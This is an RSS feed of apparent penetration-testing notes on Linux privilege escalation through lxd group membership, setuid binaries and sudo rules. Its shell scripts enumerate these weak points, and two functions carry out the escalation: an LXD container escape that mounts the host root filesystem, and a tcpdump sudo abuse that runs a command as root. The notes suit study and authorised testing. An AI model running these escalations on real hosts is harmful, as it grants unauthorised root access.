<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Linux on LEIKAH</title><link>https://leikah.haoyingcao.xyz/en/tags/linux/</link><description>Recent content in Linux on LEIKAH</description><generator>Hugo</generator><language>en</language><atom:link href="https://leikah.haoyingcao.xyz/en/tags/linux/index.xml" rel="self" type="application/rss+xml"/><item><title>Linux</title><link>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/</guid><description/></item><item><title>Permission-based</title><link>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/</guid><description/></item><item><title>Privileged Groups</title><link>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/priv_groups/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/priv_groups/</guid><description>&lt;p&gt;Certain groups give their members high privileges that can be abused to obtain root access on the host. Below are some examples:&lt;/p&gt;
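&lt;p&gt;As an added example that is not part of the original page, the shell helpers below enumerate who holds membership in root-equivalent groups, the check a practitioner runs before looking at any one group in detail, and wrap the LXC/LXD container escape covered in the next section in a function. The &lt;code&gt;/etc/group&lt;/code&gt; content in &lt;code&gt;SAMPLE_GROUP&lt;/code&gt; is constructed, the group list is a reasonable starting set rather than an exhaustive one, and the LXD image alias is an assumption about what the host can start.&lt;/p&gt;

```shell
#!/bin/sh
# Added example (not from the original page): enumerate who is in the groups
# that are root-equivalent or close to it, then the LXD escape this page describes.
# SAMPLE_GROUP is constructed /etc/group content; on a real host pass
# "$(cat /etc/group)" instead.

# Groups whose members can reach root: lxd/docker (privileged containers),
# disk (raw block device access), sudo/wheel (sudo), shadow (password hashes),
# adm (logs, which often leak credentials). Extend to taste.
PRIV_GROUPS="lxd docker disk sudo wheel shadow adm"

SAMPLE_GROUP='root:x:0:
adm:x:4:syslog,john
lxd:x:110:devops
docker:x:999:
sudo:x:27:john
users:x:100:devops,john'

# priv_group_members GROUP_CONTENT
#   Prints "group:user" for every user listed in a privileged group.
#   Only explicit membership is checked; a user whose primary GID is a
#   privileged group (field 4 of /etc/passwd) needs a second pass.
priv_group_members() {
  printf '%s\n' "$1" | while IFS=: read -r gname _pw _gid members; do
    for g in $PRIV_GROUPS; do
      if [ "$gname" = "$g" ]; then
        oldifs=$IFS
        IFS=,
        for u in $members; do
          printf '%s:%s\n' "$gname" "$u"
        done
        IFS=$oldifs
      fi
    done
  done
}

# in_priv_group USER GROUP_CONTENT
#   Exit status 0 if USER is an explicit member of any privileged group.
in_priv_group() {
  priv_group_members "$2" | cut -d: -f2 | grep -qx -- "$1"
}

# lxd_host_root_escape [IMAGE] [MOUNTPOINT]
#   The LXC/LXD technique from this page: a privileged container with the
#   host root filesystem attached as a disk device. IMAGE is an assumption
#   (an alias LXD can already start; air-gapped hosts need "lxc image import").
#   Never executed by the checks in this script.
lxd_host_root_escape() {
  image=${1:-ubuntu:22.04}
  mnt=${2:-/mnt/root}
  lxc init "$image" privesc -c security.privileged=true
  lxc config device add privesc host-root disk source=/ path="$mnt" recursive=true
  lxc start privesc
  # Root inside the container is root on the host filesystem under $mnt.
  lxc exec privesc -- /bin/sh
}

# Demo run on the constructed data.
priv_group_members "$SAMPLE_GROUP"
```

&lt;p&gt;On the constructed data the helper reports &lt;code&gt;devops&lt;/code&gt; through &lt;code&gt;lxd&lt;/code&gt; and &lt;code&gt;john&lt;/code&gt; through both &lt;code&gt;adm&lt;/code&gt; and &lt;code&gt;sudo&lt;/code&gt;; the empty &lt;code&gt;docker&lt;/code&gt; line shows why a group existing is not the finding, membership is.&lt;/p&gt;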
&lt;h2 id="lxclxd"&gt;LXC/LXD&lt;a class="td-heading-self-link" href="#lxclxd" aria-label="Heading self-link"&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;LXD is Ubuntu&amp;rsquo;s system-container manager, comparable to Docker, and is controlled through a UNIX socket that members of the &lt;code&gt;lxd&lt;/code&gt; group can use without further authentication. Because the LXD daemon runs as root, that membership is root-equivalent, and the LXD documentation itself warns that it should only be given to users trusted with root on the host. On Ubuntu the initial user is frequently a member of this group, and administrators add further accounts so they can manage containers.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-shell-session" data-lang="shell-session"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devops@NIX02:~$ id
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#bf616a"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uid=1009(devops) gid=1009(devops) groups=1009(devops),110(lxd)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A member of the &lt;code&gt;lxd&lt;/code&gt; group can escalate by launching a container with &lt;code&gt;security.privileged=true&lt;/code&gt; (so root inside the container is real root rather than a mapped unprivileged UID), attaching the host&amp;rsquo;s &lt;code&gt;/&lt;/code&gt; to it as a disk device mounted at a path such as &lt;code&gt;/mnt/root&lt;/code&gt;, and then reading or writing any host file from inside the container, for example &lt;code&gt;/etc/shadow&lt;/code&gt; or &lt;code&gt;/root/.ssh/authorized_keys&lt;/code&gt;. The only prerequisite beyond group membership is an image LXD can start; on isolated hosts this usually means importing one.&lt;/p&gt;</description></item><item><title>setuid</title><link>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/suid/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/suid/</guid><description>&lt;p&gt;The &lt;strong&gt;Set User ID upon Execution (setuid)&lt;/strong&gt; permission makes a binary run with the effective user ID of the file&amp;rsquo;s owner instead of the user who launched it (the Linux kernel ignores the bit on interpreted scripts). When the owner is root, anyone who can execute the file holds root&amp;rsquo;s privileges for as long as that program runs, so any way of making the program execute an arbitrary command is a privilege escalation.&lt;/p&gt;
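&lt;p&gt;Because a setuid-root binary hands out root to whoever can run it, the first job is to find them all and separate the ones the distribution ships from anything unusual. The following is an added example, not code from the original page: a shell triage that runs the same &lt;code&gt;find&lt;/code&gt; predicate and filters the result against a partial baseline of stock setuid programs. The baseline is an assumption to be confirmed against the package manager of the target, not an allowlist.&lt;/p&gt;

```shell
#!/bin/sh
# Added example (not from the original page): find setuid binaries and
# separate stock ones from anything unusual. BASELINE is a partial list of
# programs that common distributions ship setuid-root; treat it as a starting
# point, not an allowlist, and confirm each entry against the package manager.

BASELINE="sudo su passwd chsh chfn gpasswd newgrp mount umount pkexec fusermount fusermount3 ssh-keysign"

# find_setuid ROOT OWNER
#   Regular files under ROOT owned by OWNER with the setuid bit (-perm -4000).
#   Run as an unprivileged user, find reports directories it cannot enter on
#   stderr; that noise is expected and can be discarded.
find_setuid() {
  find "$1" -type f -user "$2" -perm -4000 -print
}

# unexpected_setuid ROOT OWNER
#   The subset of find_setuid whose basename is not in BASELINE. These are
#   the binaries worth checking on GTFOBins, for version-specific bugs, and
#   for writable libraries or PATH lookups they rely on.
unexpected_setuid() {
  find_setuid "$1" "$2" | while IFS= read -r path; do
    name=$(basename "$path")
    known=0
    for b in $BASELINE; do
      if [ "$name" = "$b" ]; then
        known=1
      fi
    done
    if [ "$known" -eq 0 ]; then
      printf '%s\n' "$path"
    fi
  done
}

# show_setuid ROOT OWNER
#   Long listing of every setuid file, so the s bit in the owner's execute
#   position (for example -rwsr-xr-x) is visible.
show_setuid() {
  find_setuid "$1" "$2" | while IFS= read -r path; do
    ls -ld "$path"
  done
}

# Live run only when asked for, since walking / takes a while:
#   sh setuid_triage.sh --live
if [ "${1:-}" = "--live" ]; then
  unexpected_setuid / root
fi
```

&lt;p&gt;Anything &lt;code&gt;unexpected_setuid&lt;/code&gt; prints is the candidate list for the next step; a stock binary only becomes interesting when its version is known to be vulnerable.&lt;/p&gt;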
&lt;p&gt;The following command lists setuid files owned by root. &lt;code&gt;-perm -4000&lt;/code&gt; matches the setuid bit, errors from directories we cannot read are discarded, and in the &lt;code&gt;ls -l&lt;/code&gt; permission string the bit shows up as an &lt;code&gt;s&lt;/code&gt; in the owner&amp;rsquo;s execute position (for example &lt;code&gt;-rwsr-xr-x&lt;/code&gt;).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;find / -user root -perm -4000 -exec ls -ldb &lt;span style="color:#81a1c1"&gt;{}&lt;/span&gt; &lt;span style="color:#ebcb8b"&gt;\;&lt;/span&gt; 2&amp;gt;/dev/null
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If any of the executables listed can be made to run a command of our choosing, whether through a documented option or shell escape, a library or relative PATH lookup we control, or a vulnerability in that specific version, the command runs as root and the binary becomes our privilege escalation.&lt;/p&gt;</description></item><item><title>Sudo</title><link>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/sudo/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/sudo/</guid><description>&lt;p&gt;Sudo privileges can be granted to an account, permitting it to run specific commands as root or as another user. When a command is prefixed with &lt;code&gt;sudo&lt;/code&gt;, sudo checks the rules in &lt;code&gt;/etc/sudoers&lt;/code&gt; (and any files included from &lt;code&gt;/etc/sudoers.d/&lt;/code&gt;) to decide whether the invoking user may run that exact command, as which user, and whether a password is required.&lt;/p&gt;
&lt;p&gt;Sudo privileges can be enumerated using &lt;code&gt;sudo -l&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sometimes running this command requires us to provide the user&amp;rsquo;s password.&lt;/li&gt;
&lt;li&gt;If an entry is marked with &lt;code&gt;NOPASSWD&lt;/code&gt;, we can run the command without providing the user&amp;rsquo;s password.&lt;/li&gt;
&lt;/ul&gt;
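&lt;p&gt;Reading &lt;code&gt;sudo -l&lt;/code&gt; output by hand is fine for one host, but the format is regular enough to parse: a run-as group in parentheses, optional tags such as &lt;code&gt;NOPASSWD:&lt;/code&gt; that stay in effect for the rest of the line, and comma-separated commands. The following is an added example, not code from the original page: it turns a &lt;code&gt;sudo -l&lt;/code&gt; listing into one rule per command, flags the NOPASSWD ones, and marks binaries that &lt;a href="https://gtfobins.org/"&gt;GTFOBins&lt;/a&gt; documents as abusable under sudo. &lt;code&gt;SAMPLE&lt;/code&gt; is constructed to resemble the listing on this page, the &lt;code&gt;GTFOBINS&lt;/code&gt; list is a hand-picked subset of that site, and the &lt;code&gt;tcpdump&lt;/code&gt; function reproduces the GTFOBins sudo entry for that binary.&lt;/p&gt;

```shell
#!/bin/sh
# Added example (not from the original page): parse "sudo -l" output, flag
# NOPASSWD entries, and mark binaries that GTFOBins documents as abusable
# under sudo. GTFOBINS is a hand-picked subset of the site, not the full
# list; SAMPLE is constructed to resemble the listing on this page.

GTFOBINS="tcpdump vim vi find less more awk python python3 perl env bash sh tar zip nmap man apt-get"

SAMPLE='Matching Defaults entries for john on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/tcpdump
    (root) /usr/bin/apt-get
    (ALL : ALL) NOPASSWD: /usr/bin/find /var/log, /usr/bin/less'

# sudo_rules SUDO_L_OUTPUT
#   One line per permitted command: "runas|PASSWD-or-NOPASSWD|basename|spec".
#   Tags (NOPASSWD:, SETENV:, ...) apply to every following command on the
#   same line, which is how sudoers itself treats them.
sudo_rules() {
  printf '%s\n' "$1" | awk '
    /may run the following commands/ { inrules = 1; next }
    inrules == 0 || NF == 0 { next }
    {
      line = $0
      runas = "?"
      if (match(line, /^[ \t]*\([^)]*\)/)) {
        runas = substr(line, RSTART, RLENGTH)
        gsub(/^[ \t]*\(|\)$/, "", runas)
        line = substr(line, RSTART + RLENGTH)
      }
      pw = "PASSWD"
      split(line, parts, ",")
      for (i = 1; i in parts; i++) {
        spec = parts[i]
        gsub(/^[ \t]+|[ \t]+$/, "", spec)
        while (match(spec, /^[A-Z]+:[ \t]*/)) {
          tag = substr(spec, RSTART, RLENGTH)
          sub(/:.*/, "", tag)
          if (tag == "NOPASSWD" || tag == "PASSWD") pw = tag
          spec = substr(spec, RSTART + RLENGTH)
        }
        split(spec, words, "[ \t]+")
        bin = words[1]
        sub(/.*\//, "", bin)
        printf "%s|%s|%s|%s\n", runas, pw, bin, spec
      }
    }'
}

# gtfo_nopasswd SUDO_L_OUTPUT
#   Basenames that need no password and have a documented GTFOBins escape:
#   the highest-value targets, one per line, in listing order.
gtfo_nopasswd() {
  sudo_rules "$1" | while IFS='|' read -r runas pw bin spec; do
    if [ "$pw" = NOPASSWD ]; then
      for g in $GTFOBINS; do
        if [ "$bin" = "$g" ]; then
          printf '%s\n' "$bin"
        fi
      done
    fi
  done
}

# tcpdump_root_cmd CMD
#   The GTFOBins sudo entry for tcpdump: -z runs a post-rotate command, -Z root
#   keeps that command running as root, and -G 1 -W 1 forces one rotation after
#   a second so CMD runs exactly once. Not run by the checks in this script.
tcpdump_root_cmd() {
  tf=$(mktemp)
  printf '#!/bin/sh\n%s\n' "$1" | tee "$tf"
  chmod +x "$tf"
  sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z "$tf" -Z root
}

# Demo on the constructed listing.
sudo_rules "$SAMPLE"
```

&lt;p&gt;On the constructed listing the parser yields four rules and &lt;code&gt;gtfo_nopasswd&lt;/code&gt; returns &lt;code&gt;tcpdump&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt; and &lt;code&gt;less&lt;/code&gt;; &lt;code&gt;apt-get&lt;/code&gt; is also on GTFOBins but needs the user&amp;rsquo;s password, which is why the two checks are kept separate. Against a live host replace &lt;code&gt;SAMPLE&lt;/code&gt; with &lt;code&gt;"$(sudo -n -l)"&lt;/code&gt;.&lt;/p&gt;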
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-shell-session" data-lang="shell-session"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;john@NIX02:~$ sudo -l
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#bf616a"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Matching Defaults entries for john on NIX02:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#bf616a"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;User john may run the following commands on NIX02:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (root) NOPASSWD: /usr/sbin/tcpdump
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;From here, the goal is to &lt;strong&gt;execute commands of our choosing from the program we are allowed to run&lt;/strong&gt;. &lt;a href="https://gtfobins.org/"&gt;GTFOBins&lt;/a&gt; catalogues such techniques per binary (for &lt;code&gt;tcpdump&lt;/code&gt;, for instance, its post-rotate command option runs an arbitrary program as the capturing user, which is root unless privileges are dropped); failing that, research vulnerabilities in the specific installed version of the executable. Note what the Defaults above rule out: &lt;code&gt;secure_path&lt;/code&gt; fixes the PATH the command runs with, so hijacking a relative lookup is not an option here, and &lt;code&gt;env_reset&lt;/code&gt; strips most environment variables before the command starts.&lt;/p&gt;</description></item></channel></rss>